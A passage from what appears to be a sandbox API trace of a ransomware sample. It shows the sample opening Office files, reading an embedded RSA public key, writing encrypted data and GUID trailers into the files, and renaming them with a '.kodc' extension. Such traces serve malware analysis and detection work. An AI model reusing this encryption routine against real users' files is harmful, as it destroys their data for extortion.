hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac70 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac58 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac28 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac10 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d7f8 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.881] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x16eea, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x16eea, lpOverlapped=0x0) returned 1 [0098.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.882] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16eef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.882] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.882] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.882] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.882] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.883] CloseHandle (hObject=0x5cc) returned 1 [0098.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.893] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xQkheU94ecT41Hfv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xqkheu94ect41hfv.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xQkheU94ecT41Hfv.pptx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xqkheu94ect41hfv.pptx.kodc")) returned 1 [0098.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.894] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.895] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3a02490, ftCreationTime.dwHighDateTime=0x1d56619, ftLastAccessTime.dwLowDateTime=0x6b964af0, ftLastAccessTime.dwHighDateTime=0x1d5bfc2, ftLastWriteTime.dwLowDateTime=0x6b964af0, ftLastWriteTime.dwHighDateTime=0x1d5bfc2, nFileSizeHigh=0x0, nFileSizeLow=0xb8b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y2SVijXO1-hEI.pptx", cAlternateFileName="Y2SVIJ~1.PPT")) returned 1 [0098.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.895] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y2SVijXO1-hEI.pptx") returned=".pptx" [0098.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y2SVijXO1-hEI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y2svijxo1-hei.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.895] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=47280) returned 1 [0098.895] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.898] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb88a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.898] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.899] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.899] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xb8b0, lpOverlapped=0x0) returned 1 [0098.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.899] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.900] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.900] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.900] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.900] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.900] GetLastError () returned 0x0 [0098.900] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.900] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.901] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.901] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.901] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb8b0) returned 0x9ba4d90 [0098.901] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d7f8 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac10 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d840 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac28 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac58 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac70 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.901] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac58 | out: hHeap=0x630000) returned 1 [0098.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac70 | out: hHeap=0x630000) returned 1 [0098.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ac70 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ac58 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac70 | out: hHeap=0x630000) returned 1 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac58 | out: hHeap=0x630000) returned 1 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.903] GetCurrentThreadId () returned 0x42c [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8fb38 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.903] GetCurrentThreadId () returned 0x42c [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac58 [0098.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac70 [0098.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac40 [0098.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ac88 [0098.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0098.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac58 | out: hHeap=0x630000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac58 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 